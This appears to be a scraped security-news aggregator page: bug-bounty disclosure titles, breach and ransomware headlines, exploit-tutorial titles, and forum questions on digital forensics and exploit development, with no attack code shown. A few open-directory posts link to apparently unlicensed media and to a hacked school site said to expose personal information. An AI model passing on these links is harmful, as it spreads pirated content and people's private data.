    Hi friends, I recently upgraded Cellebrite UFED to the most recent update. Upon completing this, all USB ports on the machine became inactive. There are about 20 ports between the front and the back of this machine. The keyboard and mouse quit working, all plugged in USB drives were unrecognized. After uninstalling Cellebrite completely, all USB ports became active again. However, now, our EnCase dongle is unrecognized. Has anyone run into this issue? I found one article from 2020 and this is a known problem with UFED. submitted by /u/Fun_House2633 [link] [comments]
  • Open

    many commands can be manipulated to delete identities or affiliations
    Hyperledger disclosed a bug submitted by cet2000: https://hackerone.com/reports/348090 - Bounty: $500
    Read-only administrator can change agent update settings
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1538004 - Bounty: $200
  • Open

    LyScript, an x64dbg automated debugging plugin
    An x64dbg automation control plugin that implements remote dynamic debugging. It addresses the problem that the native scripting is not powerful enough for reverse engineers analyzing vulnerabilities and anti-virus analysts unpacking samples, speeds up the development of exploit programs, and assists vulnerability discovery and malware analysis.
    What is IPv6 translation technology? A brief look at two IPv6 translation techniques
    Compared with dual-stack and tunneling, IPv6 translation offers a shorter migration cycle, lower cost, and flexible deployment, and is currently the main approach major government and enterprise websites use for IPv6 upgrades.
    FreeBuf Morning Report | Fake-order telecom fraud cases make up 40% of all telecom fraud cases; new malicious Python libraries found on PyPI
    The industry standard "Cloud Computing Security Shared Responsibility Model" was officially released and took effect in July 2022.
    Reproducing Tomcat middleware vulnerabilities
    Reproduction of some Tomcat vulnerabilities
    Beware! Hackers are stealing credit cards from classified-ad websites
    The attackers also tried to use one-time passwords (OTP) on banking platforms to transfer funds directly into their own accounts.
    New malicious Python libraries found on PyPI
    Security researchers at Check Point discovered 10 malicious packages on the Python Package Index (PyPI).
    CISA warns of Windows and UnRAR vulnerabilities exploited in the wild
    The US Cybersecurity and Infrastructure Security Agency (CISA) recently added two vulnerabilities to its Known Exploited Vulnerabilities catalog. One of them has lurked as a zero-day in the Windows Support Diagnostic Tool (MSDT) for more than two years and has publicly available exploit code. Both security issues are high severity and are directory traversal vulnerabilities that can help attackers plant malware on target systems. The vulnerability, tracked as CVE-2022-34713 and informally called DogWalk, is a security flaw in MSDT that allows attackers
    After Twilio, Cloudflare employees hit by the same phishing attack
    At least 76 employees received phishing text messages on their personal or work phone numbers, and some messages were also sent to employees' family members.
  • Open

    Repost: TV Shows, audiobooks, NSFW content
    This was posted a year ago, but is still up with content people might be interested in if they missed this post (https://www.reddit.com/r/opendirectories/comments/ox9ife/08032021_daily_post/) http://195.154.165.20/data/TDownloads/ submitted by /u/JiminythecricketinOz [link] [comments]
  • Open

    Best ways to practice X86 Win exploit dev?
    Hi all :) I'm currently taking the OSED course from OffSec, and my lab time is starting to run out (30 days). I kinda finished all of the exercises there anyway. Are there any recommendations on exploit exercises/sites focusing on win-x86 I can take? Monthly subscription sites are also fine if they are worth it. Exercises including RE are fine, but even better are ones with only a "poc" script (access violation), as I feel my main focus should be on the exploit building. Thank you! submitted by /u/Tasty_Diamond_69420 [link] [comments]

  • Open

    SD-PWN Part 4 — VMware VeloCloud — The Last Takeover?
    submitted by /u/biggorilla135 [link] [comments]
    Discovering Domains via a Timing Attack on Certificate Transparency
    submitted by /u/0xdea [link] [comments]
    Microsoft Office to publish symbols starting August 2022
    submitted by /u/TheDarthSnarf [link] [comments]
    Security Best Practices in PHP
    submitted by /u/pigoretee [link] [comments]
    LibAFL: A Framework to Build Modular and Reusable Fuzzers
    submitted by /u/domenukk [link] [comments]
    Advisory: Cisco Small Business RV Series Routers Web Filter Database Update Command Injection Vulnerability
    submitted by /u/g_e_r_h_a_r_d [link] [comments]
    Auditing Crypto Wallets
    submitted by /u/catlasshrugged [link] [comments]
  • Open

    Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors
    Article URL: https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039 Comments URL: https://news.ycombinator.com/item?id=32404209 Points: 2 # Comments: 0
    CVE-2020-2038: PAN-OS version 10.0 suffers from remote code exec vulnerability
    Article URL: https://security.paloaltonetworks.com/CVE-2020-2038 Comments URL: https://news.ycombinator.com/item?id=32400260 Points: 1 # Comments: 1
  • Open

    Get The Best Red-Team Penetration Testing
    The ‘red-team’ penetration test simulates real attack scenarios (“Friendly Hacking”) by bypassing security defenses while remaining… Continue reading on Medium »
    VAPT — Common & Uncommon Interview Questions! Episode-2
    This is a continuation of the amazing Common & Uncommon Interview Questions for VAPT. If you haven’t read the first article you can find… Continue reading on Medium »
  • Open

    [CRITICAL] Full account takeover without user interaction on sign with Apple flow
    Glassdoor disclosed a bug submitted by emanelyazji: https://hackerone.com/reports/1639802 - Bounty: $3000
    Ability to escape database transaction through SQL injection, leading to arbitrary code execution
    HackerOne disclosed a bug submitted by jobert: https://hackerone.com/reports/1663299
  • Open

    End to End: Testing Go Services
    A comprehensive example of testing at every layer. Continue reading on Udacity Eng & Data »
  • Open

    Creating a basic backdoor on an android mobile
    No content preview
    Stored XSS to Account Takeover : Going beyond document.cookie (Dumping IndexedDB)
    No content preview
    PortSwigger Web Security Academy Lab: SQL injection vulnerability allowing login bypass
    No content preview
    About the discovery of another security vulnerability in NASA
    No content preview
    IW Weekly #15: Admin account takeover, IDOR broken authentication, CyberChef alternatives, Dark web…
    No content preview
  • Open

    Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius
    Tropical Scorpius has been deploying Cuba Ransomware using novel tools and techniques, such as a new malware family, ROMCOM RAT. The post Novel News on Cuba Ransomware aka Greetings From Tropical Scorpius appeared first on Unit 42.
  • Open

    SecWiki News 2022-08-09 Review
    How to import billions of DNS records into Elasticsearch by BaCde Fuzzing: Grammars by 路人甲 SharpTongue Deploys Clever Mail-Stealing Browser Extension by 路人甲 For more of the latest articles, visit SecWiki
  • Open

    Bluey, movies and workout videos.
    submitted by /u/littlepreptalk [link] [comments]
    A website which has a lot of PDF files, mostly all scams.
    !!!DO NOT GO TO THESE SITES PROMISING FREE STUFF, IT'S ALL A SCAM AND THEY WILL HACK YOU NO MATTER WHAT YOU DO!!! This site used to belong to a school located in India, which apparently was botted out by hackers. This website would fill up with a load of PDF files with scams in them. Some are fake "I'm not a robot" verifications, some are Free Robux scams, some are related to Minecraft scams, and many more. Files that belonged to the school still remain though. And another thing, files that belong to the school have names and important information in the PDFs. Read them at your own risk. There's now a new website that belongs to the school, and it still exists today, a school located in India named "Salwan Public School, Gurugram". If you want to check it out for yourself, here are the links: Hacked Indian school website New Indian school website (not hacked) Basically it's the same domain but the new website removed the "www" in the link. submitted by /u/SinisterYT06 [link] [comments]
  • Open

    Free tool to process forensic artefacts (DD, Kape etc.) in AWS
    https://www.cadosecurity.com/cado-community-edition/ submitted by /u/zenomeno [link] [comments]
    Zero to Hero Malware Reverse Engineering & Threat Intelligence
    submitted by /u/cybersocdm [link] [comments]
    How to export all data from Confluence
    Does anyone know how can I export the entire Confluence for the organization? It seems that native export is missing calendars and blogs. submitted by /u/urengoy [link] [comments]
    How to quarantine/isolate a laptop?
    I have a laptop coming in for forensic examination and I am nervous. The EDR software we have on it has a quarantine feature that failed. So far I have remotely shut down the computer, reset the user's password and disabled the computer account in AD. I am afraid when I turn it on it will auto-connect to the company wifi. I don't have a Faraday cage, but would a switch just connected to a power source and nothing else be sufficient? submitted by /u/Enes_24 [link] [comments]
  • Open

    Everything you need to know about starting a career in bug bounty hunting
    Introduction Continue reading on Medium »
    TOP Cross-Chain Bridge Open Test Is Underway
    Since the emergence of DeFi, the congestion and high GAS fees of the Ethereum has hit heated discussions and led to the emergence of many… Continue reading on TOP Network »
    Pentester Promiscuous Notebook
    gitbook for keeping my pentest notes on hand. It’s far from being perfect in terms of organization (that’s why I call it “promiscuous”)… Continue reading on Medium »
    How Bug Bounty Can Help You Gain Confidence
    If you’re looking for a way to gain confidence, earn some extra money and get a job as a penetration tester, then bug bounty might be for… Continue reading on Medium »
  • Open

    FreeBuf Morning Report | Google Search suffers global outage; personal information leaked from multiple e-commerce platforms
    Reportedly, more than 40,000 people in the US reported being unable to use Google Search, and users in the UK, Australia, and Singapore also reported Google outages.
    FreeBuf Chengdu cybersecurity enterprise survey officially launched
    Local cybersecurity vendors are warmly invited to participate and sign up!
    Enterprise Network Security Best Practice Guide (Part 7)
    This series consists of 8 articles and mainly shares the author's own lessons learned from building and operating enterprise network security, covering network security management, network security architecture, network security technology, and security practice, striving to describe every aspect of enterprise network security in full, so that enterprise network security
    Enterprise Network Security Best Practice Guide (Part 6)
    This series consists of 8 articles and mainly shares the author's own lessons learned from building and operating enterprise network security, covering network security management, network security architecture, network security technology, and security practice, striving to describe every aspect of enterprise network security in full, so that enterprise network security
    斗象 (Tophant) attends the CICV Tech Week forum to discuss building connected-vehicle security capabilities
    2022-8-9 23:58:59
    How attackers adapted and evolved after Microsoft disabled macros
    Researchers believe attackers will increasingly use container-type files for delivery and rely less on macro-laden attachments.
    Meta cracks down on South Asian cyberattack campaigns abusing Facebook
    Facebook's parent company Meta disclosed that it took countermeasures against two attack groups in South Asia, both of which used its social media platform to distribute malware to potential targets.
    Employees phished; cloud communications giant Twilio's customer data leaked
    Twilio said attackers used an SMS phishing attack to steal employee credentials, then got into internal systems and exposed some customer data.
    7-Eleven stores in Denmark close due to cyberattack
    After suffering a cyberattack, 7-Eleven stores in Denmark saw their payment and checkout systems fail completely and chose to close.
  • Open

    Browsers automatically connect to ports 8008 and 8009
    Hi, I checked the open TCP connections on my machine using Sysinternals TCPView. I saw that I have open connections from Chrome to ports 8008 and 8009 on a machine in my LAN. It seems like the address of my Xiaomi Mi Box. I noticed that when I open Chrome/Firefox/Edge it automatically connects to this address and ports. I performed a quick Google search, didn't find too much information about these ports, but some mention them as related to Chromecast. I'm trying to understand if this is something legit, and what makes my browser automatically connect to this address. Is there some sort of auto-discovery process for these devices? Or is it possible (hopefully not) that I have some malware? Any information will be appreciated. Thanks, Gabriel submitted by /u/gabrielszt
    I rooted my phone. Am I compromised?
    I used FonePaw data recovery tool's Android root feature to root my phone. The recovery failed, but I sure as hell am rooted. Certain apps on my Android homepage have changed location several times without me doing it. Sometimes I see my phone light up like getting a notification but don't get anything. Is my phone compromised? submitted by /u/remidentity
  • Open

    Fuzzing: Grammars
    Author: 时钟@RainSec. This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org. Fuzzing input: one core idea of fuzzing is to trigger the program's various branches of logic with a large volume of inputs, so whether fuzzing succeeds is closely tied to how inputs are generated. Inputs come in many formats: files, code, JSON data and so on. But the various...
    Breaking the pebble template injection restrictions in a Spring setting
    Author: Y4tacker. Original link: https://tttang.com/archive/1692/. Preface: I was busy with 强网杯 (QWB CTF) last weekend and only got halfway through this challenge before shelving it, finally getting stuck at bypassing RCE in the latest pebble template engine. Today I'm taking the time to continue the remaining analysis, and since the challenge contains a few tricks usable in real-world scenarios I'm sharing them as well. Challenge environment analysis: a nice challenge that provides a docker environment for local setup, with permissions set such that you need to run ./g...
  • Open

    Storm Kitty Reversal by Your friendly Homeless Hacker / Reverser
    Prynt Stealer Stub 4.5.1 We can see there are around 13 classes in the MSIL executable that consist of screen clipping keylogging stealers… Continue reading on Medium »

  • Open

    An Attacker's Perspective
    Something I've thought about quite often during my time in DFIR is the threat actor's perspective...what is the attacker seeing and thinking during their time in an infrastructure. As a DFIR analyst, I don't often get to 'see' the threat actor's actions, at least not fully. Rather, my early perspective was based solely on what was left behind. That's changed and expanded over the years, as we've moved from WinXP/2000/2003 to Win7 and Win10, and added some modicum of enterprise capability by deploying EDR. During the better part of my time as a responder, EDR was something deployed after an incident had been detected, but the technology we deployed at that time had a targeted "look back" capability that most current EDR technologies do not incorporate. This allowed us to quickly target the …
  • Open

    Why do we still use unencrypted networking protocols (like HTTP)?
    Networking novice here, been messing around with Wireshark and noticed that some services, including Microsoft, call out to external servers using HTTP instead of HTTPS. I'm curious what advantages HTTP offers that would make someone eschew the increased security of HTTPS. It seems to me -- admittedly as someone joining the game in the 8th inning in terms of networking's history -- that unsecured protocols should be deprecated. Is there something I'm missing? submitted by /u/DataMoreLikeShplada
    What would you do on your first day if you were the US Cyber Security Czar?
    What would you do on your first day as the US Cyber Security Czar with a budget in the billions of dollars? submitted by /u/greyyit
  • Open

    How long should the Plaso ingest plugin from Autopsy take?
    (crossposted with r/digitalforensics) I'm running Autopsy 4.19.3 on a Win10 Enterprise VM using the Plaso ingest plugin on a 40GB .e01 image taken from a 256GB drive. I ran all the other ingest plugins I intended to use beforehand, closed the case, shut down Autopsy and restarted before I started the Plaso ingest. The VM is on ESXi 7; it has 16 cores (the host has 32), 128mb of RAM of which currently only 15GB is in use, and the host has dual Xeon E5-2690 @ 2.90GHz. The ingest was started a week ago (2022/08/01 14:54 PDT) and the progress bar is still at 0%. log2timeline has been consistently maxing three cores the entire time and the file being worked on changes when I click on the progress bar for its status. So it's doing something. How long is this going to eventually take? Is there anything in the case or Autopsy appdata folder that would give me more information? Is it possible to run a Plaso ingest with more than three log2timeline processes? submitted by /u/thenebular
    Snapchat Forensics
    Does anyone have a good link to where I can find more information about the databases in Snapchat? I have some snaps under the path "Snapchat Gallery/snaps/xxxxxx/xxxxxx.decrypted_media". I would like to know/confirm if the Snapchat Gallery/snaps folder contains ONLY media taken with the phone (so not snaps received). Does anyone have any experience with this? submitted by /u/agente_99
    Note Taking Methodology
    Hey everyone! I'm curious what everyone's note-taking methodology is. I'm kind of scatterbrained and I tend to leave little notes everywhere when doing a case. So I'm wondering what everyone else's methodology/tools are. I'm currently using Obsidian for notes but I know there is a better way. I've used Aurora but I feel like there is something lacking, though I'm not sure what. submitted by /u/shonen787
    Tips on finding a good mentor?
    Anyone have any recommendations as to where to find good mentors for blue teaming or DFIR? If not, can you share what made some of your mentors super valuable? Thanks! submitted by /u/tfulab23
    Question regarding which field to pick (Digital forensics V. eDiscovery)
    Hi, I am wondering what side of the field I should look into. I want to specifically do criminal investigation. Thank y'all, sorry for being bothersome. submitted by /u/swatteam23
    Question regarding how to learn how to use industry standard eDiscovery platforms, without being financially able to pay for training/tools.
    Hi all, I am going to college for CompEng, with a minor in DF&CompSec. I am wondering what tips you guys would have for learning how to utilize eDiscovery platforms, without much in the way of financial resources (for example Encase, and other tools). If you guys have any trainings or resources I can use freely (without the CIA having to kill me lol) that would be appreciated. :) Thanks. submitted by /u/swatteam23
    Cellebrite advanced logical vs file system
    I've just started my journey into digital forensics and I've been finding it difficult to understand and research the difference between Cellebrite's "Advanced Logical" extraction and its "Full File System" extraction. What are the capabilities and limitations of both types of extractions using Cellebrite? submitted by /u/holidaykid09
  • Open

    What do Russians think about the war? Telegram data
    Can what messages people heart-emoji or cry-emoji tell us anything about public sentiment about the war? Continue reading on Medium »
    RAAVN™ is a powerful application, designed specifically by analysts for analysts, that sifts…
    Continue reading on Medium »
  • Open

    GCHQ discovered significant vulnerability in Huawei equipment (2020)
    Article URL: https://news.sky.com/story/gchq-discovered-nationally-significant-vulnerability-in-huawei-equipment-12086688 Comments URL: https://news.ycombinator.com/item?id=32389632 Points: 13 # Comments: 0
  • Open

    zathura - SELinux confined
    submitted by /u/esp0x31
    Security Guide for Startups: How to think about security while moving quickly | LunaSec
    submitted by /u/breadchris
    SimpleX Chat - the first messaging platform that has no user identifiers (not even random numbers) - v3.1 of iOS and Android apps released - with secret chat groups and server access via Tor.
    submitted by /u/epoberezkin
    How do you secure your DNS in the cloud? - DNS in the Cloud Capabilities
    submitted by /u/MiguelHzBz
    Targeted attack on industrial enterprises and public institutions [Kaspersky]
    submitted by /u/EspoJ
    Codewarrior - open source SAST
    submitted by /u/CoolerVoid
  • Open

    The Grant Bounty
    We are thrilled to introduce the Grant Bounty as part of our V2 initiative to invite all players of Web3 to get involved in security. The… Continue reading on Medium »
    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
    Solace Partners with Hats Finance to Sponsor Bug Bounties
    Solace, the decentralized insurance provider, is partnering with Hats Finance to sponsor bug bounties for Solace-insured DApps. This… Continue reading on Solace.Fi »
    Stored XSS using SVG file
    Hey guys, hope you all are doing well. I am Bharat Singh a Security Researcher and bug hunter from India. In this writeup I am going to… Continue reading on Medium »
    JWT Common Attacks
    What Is JWT 🤔? Continue reading on Medium »
    Stored XSS in app.gitbook.com
    Hello friends, let me introduce myself: my name is Mohammad Alfin Hidayatullah and I am a bug bounty hunter. This time I want to share… Continue reading on Medium »
    From Shodan to RCE: That one time I hacked a Fortune 500 company.
    tl;dr: Continue reading on Medium »
    A simple JSON token opens an attack surface
    Or express-validator to the rescue! Continue reading on Geromics »
  • Open

    SecWiki News 2022-08-08 Review
    SecWiki Weekly (Issue 440) by ourren; CVE-2022-21999 by SecIN社区; VirusTotal report summarizing how malware abuses trust by Avenger. For more of the latest articles, visit SecWiki
  • Open

    Arab Cyber War Games NoSQL Challenge (Doctor X).
    In this CTF I developed a Nosql challenge that needs the penetration tester to Inject in many forms to find the flag. Continue reading on Medium »
    Cyber wargames web challenges
    * * * Konan challenge * * * Continue reading on Medium »
    Exploit SQL Injection and bypass captcha with SQLMAP
    Kenzy challenge (Cyber wargames 2022) Continue reading on Medium »
  • Open

    Mainly Games, Music, SW and old flash
    http://home.darkok.xyz/ Was posted one year ago: give credit to the old publisher: https://www.reddit.com/user/JasonSec/ submitted by /u/Appropriate-You-6065
  • Open

    xmlrpc.php FILE IS enable it will used for Bruteforce attack and Denial of Service(DoS)
    Top Echelon Software disclosed a bug submitted by anonymmert12: https://hackerone.com/reports/1622867
    Lack of Rate limit while joining video call in talk section which is password protected
    Nextcloud disclosed a bug submitted by error2001: https://hackerone.com/reports/1596673 - Bounty: $250
  • Open

    Kubernetes Security
    PortSwigger Web Security Academy Lab: SQL injection vulnerability in WHERE clause allowing…
  • Open

    FreeBuf Morning Report | Serious flaw found in the US Emergency Alert System; GitLab bans the use of Windows
    The US government warned of a serious vulnerability in its Emergency Alert System (EAS); GitLab was found to have a company policy banning the use of Microsoft Windows.
    Security incident response: fighting magic with magic!
    GwisinLocker ransomware launches extortion attacks targeting Windows and Linux ESXi servers
    The GwisinLocker ransomware family, which has both Windows and Linux encryptors, launched extortion attacks against South Korean healthcare, industrial and pharmaceutical companies.
    Snapchat and Amex websites abused in Microsoft 365 phishing attacks
    In a series of phishing attacks, attackers abused open redirects on the Snapchat and American Express websites in an attempt to steal victims' Microsoft 365 credentials.
    Analysis of CVE-2022-21999
    CVE-2022-21999 (CVE-2022-22718) is a printer local privilege escalation vulnerability disclosed in Microsoft's February Patch Tuesday.
    JDBC Attack as seen from BlackHat
    Covers MySQL arbitrary file read, the use of allowUrlInLocalInfile, MySQL client deserialization and more.
    NHS hit by cyberattack, systems suffer major failure
    The UK National Health Service (NHS) 111 emergency service was hit by a cyberattack, which had a major impact and caused sustained outages of the service's systems.
    Twitter admits a zero-day led to the theft of 5.4 million users' data
    Twitter officially confirmed that the vulnerability used by attackers last December is the same one it reported and fixed in January this year, and revealed that the flaw was caused by a code update last June.

  • Open

    Blackbird: An OSINT tool to search for accounts by username
    submitted by /u/sanitybit
    WinAPi Search - Recursively Search PE Binaries by Win32 Function Name
    submitted by /u/sanitybit
    Technical analysis of syzkaller based fuzzers: It's not about VaultFuzzer!
    submitted by /u/hardenedvault
  • Open

    SPY NEWS: 2022 — Week 31
    Summary of the espionage-related news stories for the Week 31 (31 July-6 August) of 2022. Continue reading on Medium »
    The execution in Olenivka (anatomy of a provocation)
    Let's try to analyze the chronology of events, what is known at the moment, and then draw conclusions. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — wagthetail
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — choochoo
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — Growing Up
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    CyberSoc CTF — Life Online — OSINT — VOTE FOR ME
    Cyber Detective CTF is an OSINT-focussed CTF created by the Cyber Society at Cardiff University. Continue reading on Medium »
    Top 10 most rated OSINT Tools on Github
    author — SATYAM PATHANIA Continue reading on Medium »
  • Open

    Getsimple CMS 3.3.10 Exploit
    Hello, it's me again; this time I want to show my documentation of exploiting Getsimple CMS 3.3.10. Continue reading on Medium »
    Introduction Session Hijacking
    Session hijacking is defined as taking over an active TCP/IP communication session without the user’s permission. When implemented… Continue reading on Medium »
    Practical XPath Injection : Attack and Defense Techniques
    Practical XPath Injection Exploits Continue reading on Medium »
    XXE Attack : Real life attacks and code examples
    XXE (XML External Entity Injection) is a web-based security vulnerability that enables an attacker to interfere with the processing of XML… Continue reading on Medium »
    Bug Bounty — What, How, Why?
    Getting started with bug bounties Continue reading on Medium »
    How To Write A Penetration Testing Report
    A Penetration testing report is the only tangible product. Continue reading on Medium »
    How I got a $10,000 Penetration Testing Project/Job with Bug Bounty
    Introduction: Continue reading on Medium »
    Everything you need to know about Cyber Security:
    Cybersecurity is the protection of Internet-connected systems such as hardware, software, and data from cyber threats. Individuals and… Continue reading on Medium »
    2FA Bypass via Google Identity & OAuth Login
    Hello All, Continue reading on Medium »
    CodeShield: Cloud Asset Inventory & Privilege Escalation Toolkit
    Hello everybody! In this blog post, we will go through a Cloud Security Tool, I recently came across: Codeshield. Continue reading on Medium »
  • Open

    Containers Vulnerability Scanner: Trivy
    This article talks about Trivy, which is a simple and comprehensive vulnerability scanner for containers and other artifacts, suitable for Continuous Integration and Testing. The post Containers Vulnerability Scanner: Trivy appeared first on Hacking Articles.
  • Open

    We always win
  • Open

    open ports forensics
    Hey there, if you get suspicious of an attacker in your computer from downloading some "free" software, how can I see the history of open ports and traffic to another computer from the day I downloaded the software? submitted by /u/ArticleUseful211
    Recovering emojis from Android Cellebrite extraction?
    Working with analysts on an Android mobile extraction. Emojis are coming up as question mark wingdings in SMS/MMS conversations. Analysts are telling me that there's no way to get that information from Android extractions, only iOS. This doesn't sound right to me. Is there advice I can give them regarding how to retrieve the emoji data? submitted by /u/md9918
    What are some more CS - Research oriented jobs?
    This is a fascinating field to work in, even from an IT perspective (not looking down upon it, it just may get repetitive for some after a while), however we don't frequently see more high-end/research oriented roles being talked about in the sub. Apart from malware analysis/reverse engineering, what are some other opportunities to work for in the digital forensics field? Or what about jobs not necessarily pertaining to OS forensics? One example I have read about would be development of tools for media forensics. One in particular is about extracting ENF from videos/audio recordings to determine the location where it was captured. Sounds cool! In case you want to read more: https://arxiv.org/pdf/1912.09428.pdf https://arxiv.org/pdf/1903.09884.pdf https://en.wikipedia.org/wiki/Electrical_network_frequency_analysis Certainly this is an already niche field among CS, but are the aforementioned roles even more niche to the extent that they exist only in an academic context? submitted by /u/FF6B9EAD
    GCFA - Study Tips
    I'm having a hard time studying RDP event IDs. Basically the entire IR part of Event IDs with different scenarios is giving me trouble. Any tips? How to best prepare for Book 2 of GCFA (Intrusion Analysis)? submitted by /u/bigpoppaash
  • Open

    ES File Explorer Open Port Vulnerability exploitation
    Enterprise: Active Directory Room From TryHackMe By Hashar Mujahid
    TryHackMe WriteUp: Agent T
    What is command injection and how to exploit it — StackZero
  • Open

    SecWiki News 2022-08-07 Review
    A brief discussion of open-source software supply chain risks by ourren; XSS in Gmail's Amp4Email by ourren; [HTB] Europa Writeup by 0x584a. For more of the latest articles, visit SecWiki
  • Open

    UX Research Around Active Directory Security
    Hello everyone, I'm a User Experience Designer in a large security company that's currently building a product around identity security, including Active Directory and Azure AD. As I conduct my research, I try to determine how many domains an organization usually has (in varying scales, of course). How are they managed? Is there a team that manages specific domains across all forests? Does one team usually take care of all the domains and not care about the others? The purpose of this question is to understand if the user needs the option to toggle between domains rather than simply filtering data by "Domain Name". If you have any other comments regarding how you manage your domain security in your organization, it would be appreciated. Thank you very much! submitted by /u/RaspberryFair8362
  • Open

    Fuzzing in Go
    “Fuzz testing is a novel way to discover security vulnerabilities or bugs in software applications.” The concept of fuzzing was introduced… Continue reading on Better Programming »
  • Open

    Lots of free PDFs and other files on various subjects
    I found a link to someone's library on the internet. https://cdn.preterhuman.net/texts/ submitted by /u/ConstProgrammer
    AC School
    submitted by /u/EGirlCollector
  • Open

    Good one but severity of this kind of attack is very low.
    Continue reading on Medium »
  • Open

    HTTP PUT method is enabled downloader.ratelimited.me
    RATELIMITED disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/545136
    Anonymous access control - Payments Status
    Omise disclosed a bug submitted by codeslayer137: https://hackerone.com/reports/1546726 - Bounty: $100
  • Open

    Phoenix Challenges -- Stack Zero
    Have been waiting for school to end for some time now to finally get back to exploit development. Finally got around to making my first exploit development writeup and wanted to share with the community. Looking forward to many more! https://secnate.github.io/ctf/phoenix/phoenix-stack-zero/?fbclid=IwAR1-XbyPP9rSrLArmTPqXNb1Tkfj_7E8_Qi3XFvaexEyZJPcuA1J_YeYkj8 Of course, any comments/feedback would be greatly appreciated! submitted by /u/ProgrammingBro123

  • Open

    Enterprise: Active Directory Room From TryHackMe
    You just landed in an internal network. You scan the network and there’s only the Domain Controller… Continue reading on InfoSec Write-ups »
    Php Object Injection Demo
    PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks… Continue reading on Medium »
    Web Application Reconnaissance Guide, Cybersec | Shubham Dhungana
    In this article, I’m going to document about the process to perform web application reconnaissance. Before reading this article, we must… Continue reading on Medium »
    PHP Object Injection
    A very common and critical vulnerability in PHP applications is PHP Object Injection. This blog post explains how they work and how they… Continue reading on Medium »
    Unsafe use of Reflection
    This vulnerability is caused by unsafe use of the reflection mechanisms in programming languages like Java or C# Continue reading on Medium »
    File Inclusion Demo
    This script is possibly vulnerable to file inclusion attacks. Continue reading on Medium »
    Code Injection
    Code Injection is the general term for attack types which consist of injecting code that is then interpreted/executed by the application… Continue reading on Medium »
    Bypassing File Type Filters
    Unrestricted File Upload — File Extension Filter Bypass Continue reading on Medium »
    Bypassing Directory Structure Filters
    Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on… Continue reading on Medium »
    Bypassing Filename Filters Demo
    One of the challenging factors to a Hacker in a web application attack is the file upload. The first step in every attack is to get some… Continue reading on Medium »
  • Open

    Windows Registry Standards?
    I'm using regshot to compare two registry snapshots against each other. Is there a standard for how to navigate around the potentially hundreds of registry changes that all look the same to a beginner? submitted by /u/Jaruki_Jurakami
    Which Wireshark book do you recommend?
    Hey there. I'm interested in learning Wireshark in my off-time from work, and I am trying to increase my time off screen, as I'm sure many of you stare at computers all day for work like me. So I'm looking for a physical book on Wireshark and packet analysis. There are a handful of well-reputed options on Amazon, but the budget's tight. Anyone read and would recommend any particular one of the well-known Wireshark books, like Wireshark 101 or Practical Packet Analysis? The reviews are all positive so it's tough to make a choice here. Many thanks. submitted by /u/DataMoreLikeShplada
    Does HTTPS Basically Make Personal VPNs Useless for Security?
    Question says it all. I'm currently going through my CCNP ENCOR, and covering IPSec in the Overlay Tunnels chapter. IPSec typically has 2 modes: transport and tunnel. Tunnel mode encrypts the ENTIRE packet, but requires dedicated endpoints - something that normies aren't going to have. Transport mode encrypts only the payload (i.e. personal data), but keeps all the original header information (ports and IP addresses). However, HTTPS already encrypts the payload of network traffic. And a huge chunk of traffic hitting the internet (not just web traffic) is HTTP-based. So would that not mean that - from a security perspective - personal (aka Transport) VPNs are basically useless? I understand the benefit of circumventing region locking for purposes of watching normally off-limits content (i.e. Netflix), but my question here is solely based on the security perspective. Many thanks for any input. submitted by /u/lfionxkshine
  • Open

    Weekly quiz covering 10 interesting infosec stories or events from the past week
    submitted by /u/jaco_za
    Kanye West's Stem Player - An engineering disaster
    submitted by /u/krystalgamer
    nday exploit: libinput format string bug, canary leak exploit (cve-2022-1215)
    submitted by /u/Gallus
  • Open

    RCE vulnerability in Hyperledger Fabric SDK for Java
    Hyperledger disclosed a bug submitted by freskimo: https://hackerone.com/reports/801370 - Bounty: $200
    Enrolling to a CA that returns an empty response crashes the node process
    Hyperledger disclosed a bug submitted by mttrbrts: https://hackerone.com/reports/506412 - Bounty: $500
    Brute Force of fabric-ca server admin account
    Hyperledger disclosed a bug submitted by xiaoc: https://hackerone.com/reports/411364 - Bounty: $1500
    cross site scripting in : mtn.bj
    MTN Group disclosed a bug submitted by alimanshester: https://hackerone.com/reports/1264834
    Ingress-nginx path allows retrieval of ingress-nginx serviceaccount token
    Kubernetes disclosed a bug submitted by gaffy: https://hackerone.com/reports/1382919 - Bounty: $2500
  • Open

    SecWiki News 2022-08-06 Review
    Kaggle knowledge: basics of time-series forecasting by ourren; A brief discussion of trends in validating the effectiveness of security controls by ourren; [HTB] Haircut Writeup by 0x584a. For more of the latest articles, visit SecWiki
  • Open

    What is OSINT
    We have been trying to find someone online, specifically perhaps by using an email address, or username. Here the use of OSINT comes. Continue reading on Medium »
  • Open

    Smart contract security best practices: PART 1
    Post-Exploitation Basics In Active Directory Environment By Hashar Mujahid
    How I was able to get 29 free products. | Bug Bounty
    Another day, Another IDOR vulnerability— $5000 Reddit Bug Bounty
    Gaining unprivileged access to Reddit moderator logs Continue reading on InfoSec Write-ups »
  • Open

    Drop your favorite resource for exploit dev
    I want to start learning exploit dev, if you guys can help me with it or drop in your favorite resource that helped you get where you are, it would be great! If someone has time and would like to answer a few questions, it would help me a lot too. submitted by /u/National_Concern2361
  • Open

    Pocsuite3: An open-sourced remote vulnerability testing framework
    Article URL: https://github.com/knownsec/pocsuite3 Comments URL: https://news.ycombinator.com/item?id=32365622 Points: 1 # Comments: 0
  • Open

    A roundup of 30+ common unauthorized access vulnerabilities
